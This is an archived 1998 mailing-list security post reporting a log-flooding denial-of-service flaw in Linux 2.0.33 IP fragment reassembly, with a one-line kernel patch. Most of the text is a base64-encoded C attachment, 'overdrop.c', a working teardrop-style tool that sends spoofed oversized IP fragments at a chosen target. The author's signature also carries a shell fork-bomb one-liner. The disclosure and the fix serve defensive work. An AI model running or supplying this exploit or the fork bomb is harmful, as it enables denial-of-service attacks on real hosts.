This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mimeat_private for more info. --8323328-871852648-892826485=:211 Content-Type: TEXT/PLAIN; charset=US-ASCII I'm not sure if it's known, but I haven't found anything about it. No matter, there's something strange in net/ipv4/ip_fragment.h (it's probably Alan's fault): [ in function ip_glue ] if(len>65535) { printk("Oversized IP packet from %s.\n", in_ntoa(qp->iph->saddr)); ip_statistics.IpReasmFails++; ip_free(qp); return NULL; } Right, printk with no NETDEBUG nor anything else. So, there's potential DoS attack - I wrote simple exploit by modyfying teardrop source (mainly, fragmentation offset of second packet = 0xFFFF), and it's quite nasty (see attachment). Fix: --- ip_fragment.c.orig Fri Apr 17 16:42:38 1998 +++ ip_fragment.c Fri Apr 17 17:17:15 1998 @@ -345,7 +345,7 @@ if(len>65535) { - printk("Oversized IP packet from %s.\n", in_ntoa(qp->iph->saddr)); + NETDEBUG(printk("Oversized IP packet from %s.\n", in_ntoa(qp->iph->saddr))); ip_statistics.IpReasmFails++; ip_free(qp); return NULL; _______________________________________________________________________ Michal Zalewski [lcamtufat_private] <= finger for pub PGP key Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch] [echo "\$0&\$0">_;chmod +x _;./_] <=------=> [tel +48 (0) 22 813 25 86] --8323328-871852648-892826485=:211 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="overdrop.c" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.LNX.3.96.980417172125.211B@genome> Content-Description: Ly8gb3ZlcmRyb3AgYnkgbGNhbXR1ZiBbTGludXggMi4wLjMzIHByaW50ayBh YnVzZV0NCi8vIC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t LS0tLS0tLS0tLS0tLQ0KLy8gYmFzZWQgb24gKHJlYXBlZCBmcm9tKSB0ZWFy ZHJvcCBieSByb3V0ZXxkYWVtb245DQoNCiNpbmNsdWRlIDxzdGRpby5oPg0K I2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5oPg0KI2lu Y2x1ZGUgPHN0cmluZy5oPg0KI2luY2x1ZGUgPG5ldGRiLmg+DQojaW5jbHVk ZSA8bmV0aW5ldC9pbi5oPg0KI2luY2x1ZGUgPG5ldGluZXQvdWRwLmg+DQoj aW5jbHVkZSA8YXJwYS9pbmV0Lmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+ DQojaW5jbHVkZSA8c3lzL3RpbWUuaD4NCiNpbmNsdWRlIDxzeXMvc29ja2V0 Lmg+DQoNCiNkZWZpbmUgSVBfTUYJMHgyMDAwDQojZGVmaW5lIElQSAkweDE0 DQojZGVmaW5lIFVEUEgJMHg4DQojZGVmaW5lIFBBRERJTkcJMHgxYw0KI2Rl ZmluZSBNQUdJQwkweDMNCiNkZWZpbmUgQ09VTlQJMHhCRUVGDQojZGVmaW5l IEZSQUcyCTB4RkZGRg0KDQp2b2lkIHVzYWdlKGNoYXIgKm5hbWUpIHsNCiAg ZnByaW50ZihzdGRlcnIsIiVzIGRzdF9pcCBbIC1uIGhvd19tYW55IF0gWyAt cyBzcmNfaXAgXVxuIixuYW1lKTsNCiAgZXhpdCgwKTsNCn0NCg0KdV9sb25n IG5hbWVfcmVzb2x2ZShjaGFyICpob3N0X25hbWUpIHsNCiAgc3RydWN0IGlu X2FkZHIgYWRkcjsNCiAgc3RydWN0IGhvc3RlbnQgKmhvc3RfZW50Ow0KICBp ZiAoKGFkZHIuc19hZGRyPWluZXRfYWRkcihob3N0X25hbWUpKT09LTEpIHsN CiAgICBpZiAoIShob3N0X2VudD1nZXRob3N0YnluYW1lKGhvc3RfbmFtZSkp KSByZXR1cm4gKDApOw0KICAgIGJjb3B5KGhvc3RfZW50LT5oX2FkZHIsKGNo YXIgKikmYWRkci5zX2FkZHIsaG9zdF9lbnQtPmhfbGVuZ3RoKTsNCiAgfQ0K ICByZXR1cm4gKGFkZHIuc19hZGRyKTsNCn0NCg0KDQp2b2lkIHNlbmRfZnJh Z3MoaW50IHNvY2ssdV9sb25nIHNyY19pcCx1X2xvbmcgZHN0X2lwLHVfc2hv cnQgc3JjX3BydCx1X3Nob3J0IGRzdF9wcnQpIHsNCiAgdV9jaGFyICpwYWNr ZXQ9TlVMTCwqcF9wdHI9TlVMTDsNCiAgdV9jaGFyIGJ5dGU7DQogIHN0cnVj dCBzb2NrYWRkcl9pbiBzaW47DQogIHNpbi5zaW5fZmFtaWx5PUFGX0lORVQ7 DQogIHNpbi5zaW5fcG9ydD1zcmNfcHJ0Ow0KICBzaW4uc2luX2FkZHIuc19h ZGRyPWRzdF9pcDsNCiAgcGFja2V0PSh1X2NoYXIgKiltYWxsb2MoSVBIK1VE UEgrUEFERElORyk7DQogIHBfcHRyPXBhY2tldDsNCiAgYnplcm8oKHVfY2hh ciAqKXBfcHRyLElQSCtVRFBIK1BBRERJTkcpOw0KICBieXRlPTB4NDU7DQog IG1lbWNweShwX3B0ciwmYnl0ZSxzaXplb2YodV9jaGFyKSk7DQogIHBfcHRy Kz0yOw0KICAqKCh1X3Nob3J0ICopcF9wdHIpPWh0b25zKElQSCtVRFBIK1BB RERJTkcpOw0KICBwX3B0cis9MjsNCiAgKigodV9zaG9ydCAqKXBfcHRyKT1o dG9ucygyNDIpOw0KICBwX3B0cis9MjsNCiAgKigodV9zaG9ydCAqKXBfcHRy KXw9aHRvbnMoSVBfTUYpOw0KICBwX3B0cis9MjsNCiAgKigodV9zaG9ydCAq KXBfcHRyKT0weDQwOw0KICBieXRlPUlQUFJPVE9fVURQOw0KICBtZW1jcHko cF9wdHIrMSwmYnl0ZSxzaXplb2YodV9jaGFyKSk7DQogIHBfcHRyKz00Ow0K ICAqKCh1X2xvbmcgKilwX3B0cik9c3JjX2lwOw0KICBwX3B0cis9NDsNCiAg KigodV9sb25nICopcF9wdHIpPWRzdF9pcDsNCiAgcF9wdHIrPTQ7DQogICoo KHVfc2hvcnQgKilwX3B0cik9aHRvbnMoc3JjX3BydCk7DQogIHBfcHRyKz0y Ow0KICAqKCh1X3Nob3J0ICopcF9wdHIpPWh0b25zKGRzdF9wcnQpOw0KICBw X3B0cis9MjsNCiAgKigodV9zaG9ydCAqKXBfcHRyKT1odG9ucyg4K1BBRERJ TkcpOw0KICBpZiAoc2VuZHRvKHNvY2sscGFja2V0LElQSCtVRFBIK1BBRERJ TkcsMCwoc3RydWN0IHNvY2thZGRyICopJnNpbiwNCiAgICAgIHNpemVvZihz dHJ1Y3Qgc29ja2FkZHIpKT09LTEpIHsNCiAgICBwZXJyb3IoIlxuc2VuZHRv Iik7DQogICAgZnJlZShwYWNrZXQpOw0KICAgIGV4aXQoMSk7DQogIH0NCiAg cF9wdHI9JnBhY2tldFsyXTsNCiAgKigodV9zaG9ydCAqKXBfcHRyKT1odG9u cyhJUEgrTUFHSUMrMSk7DQogIHBfcHRyKz00Ow0KICAqKCh1X3Nob3J0ICop cF9wdHIpPWh0b25zKEZSQUcyKTsNCiAgaWYgKHNlbmR0byhzb2NrLHBhY2tl dCxJUEgrTUFHSUMrMSwwLChzdHJ1Y3Qgc29ja2FkZHIgKikmc2luLA0KICAg ICAgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpPT0tMSkgew0KICAgIHBlcnJv cigiXG5zZW5kdG8iKTsNCiAgICBmcmVlKHBhY2tldCk7DQogICAgZXhpdCgx KTsNCiAgfQ0KICBmcmVlKHBhY2tldCk7DQp9DQoNCg0KaW50IG1haW4oaW50 IGFyZ2MsIGNoYXIgKiphcmd2KSB7DQogIGludCBvbmU9MSxjb3VudD0wLGks cmlwX3NvY2s7DQogIHVfbG9uZyAgc3JjX2lwPTAsZHN0X2lwPTA7DQogIHVf c2hvcnQgc3JjX3BydD0wLGRzdF9wcnQ9MDsNCiAgc3RydWN0IGluX2FkZHIg YWRkcjsNCiAgZnByaW50ZihzdGRlcnIsIm92ZXJkcm9wIGJ5IGxjYW10dWYg W2Jhc2VkIG9uIHRlYXJkcm9wIGJ5IHJvdXRlfGRhZW1vbjldXG5cbiIpOw0K ICBpZigocmlwX3NvY2s9c29ja2V0KEFGX0lORVQsU09DS19SQVcsSVBQUk9U T19SQVcpKTwwKSB7DQogICAgcGVycm9yKCJyYXcgc29ja2V0Iik7DQogICAg ZXhpdCgxKTsNCiAgfQ0KICBpZiAoc2V0c29ja29wdChyaXBfc29jayxJUFBS T1RPX0lQLElQX0hEUklOQ0wsKGNoYXIgKikmb25lLHNpemVvZihvbmUpKTww KSB7DQogICAgcGVycm9yKCJJUF9IRFJJTkNMIik7DQogICAgZXhpdCgxKTsN CiAgfQ0KICBpZiAoYXJnYyA8IDIpIHVzYWdlKGFyZ3ZbMF0pOw0KICBpZiAo IShkc3RfaXA9bmFtZV9yZXNvbHZlKGFyZ3ZbMV0pKSkgew0KICAgIGZwcmlu dGYoc3RkZXJyLCJDYW4ndCByZXNvbHZlIGRlc3RpbmF0aW9uIGFkZHJlc3Mu XG4iKTsNCiAgICBleGl0KDEpOw0KICB9DQogIHdoaWxlICgoaT1nZXRvcHQo YXJnYyxhcmd2LCJzOm46IikpIT1FT0YpIHsNCiAgICBzd2l0Y2ggKGkpIHsN CiAgICAgIGNhc2UgJ24nOg0KICAgICAgICBjb3VudCAgID0gYXRvaShvcHRh cmcpOw0KICAgICAgICBicmVhazsNCiAgICAgIGNhc2UgJ3MnOg0KICAgICAg ICBpZiAoIShzcmNfaXA9bmFtZV9yZXNvbHZlKG9wdGFyZykpKSB7DQogICAg ICAgICAgZnByaW50ZihzdGRlcnIsIkNhbid0IHJlc29sdmUgc291cmNlIGFk ZHJlc3MuXG4iKTsNCiAgICAgICAgICBleGl0KDEpOw0KICAgICAgICB9DQoJ YnJlYWs7DQogICAgICBkZWZhdWx0Og0KICAgICAgICB1c2FnZShhcmd2WzBd KTsNCiAgICAgICAgYnJlYWs7DQogICAgfQ0KICB9DQogIHNyYW5kb20oKHVu c2lnbmVkKSh0aW1lKCh0aW1lX3QpMCkpKTsNCiAgaWYgKCFjb3VudCkgY291 bnQ9Q09VTlQ7DQogIGZwcmludGYoc3RkZXJyLCJTZW5kaW5nIG92ZXJzaXpl ZCBwYWNrZXRzOlxuRnJvbTogIik7DQogIGlmICghc3JjX2lwKSBmcHJpbnRm KHN0ZGVyciwiICAgICAgIChyYW5kb20pIik7IGVsc2Ugew0KICAgIGFkZHIu c19hZGRyID0gc3JjX2lwOw0KICAgIGZwcmludGYoc3RkZXJyLCIlMTVzIixp bmV0X250b2EoYWRkcikpOw0KICB9DQogIGFkZHIuc19hZGRyID0gZHN0X2lw Ow0KICBmcHJpbnRmKHN0ZGVyciwiXG4gIFRvOiAlMTVzXG4iLGluZXRfbnRv YShhZGRyKSk7DQogIGZwcmludGYoc3RkZXJyLCIgQW10OiAlNWRcbiIsY291 bnQpOw0KICBmcHJpbnRmKHN0ZGVyciwiWyAiKTsNCiAgZm9yIChpPTA7aTxj b3VudDtpKyspIHsNCiAgICBpZiAoIXNyY19pcCkgc2VuZF9mcmFncyhyaXBf c29jayxyYW5kKCksZHN0X2lwLHJhbmQoKSxyYW5kKCkpOyBlbHNlDQogICAg ICBzZW5kX2ZyYWdzKHJpcF9zb2NrLHNyY19pcCxkc3RfaXAscmFuZCgpLHJh bmQoKSk7DQogICAgZnByaW50ZihzdGRlcnIsICJiMDB6ICIpOw0KICAgIHVz bGVlcCg1MDApOw0KICB9DQogIGZwcmludGYoc3RkZXJyLCAiXVxuIik7DQog IHJldHVybiAoMCk7DQp9DQo= --8323328-871852648-892826485=:211--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:49:44 PDT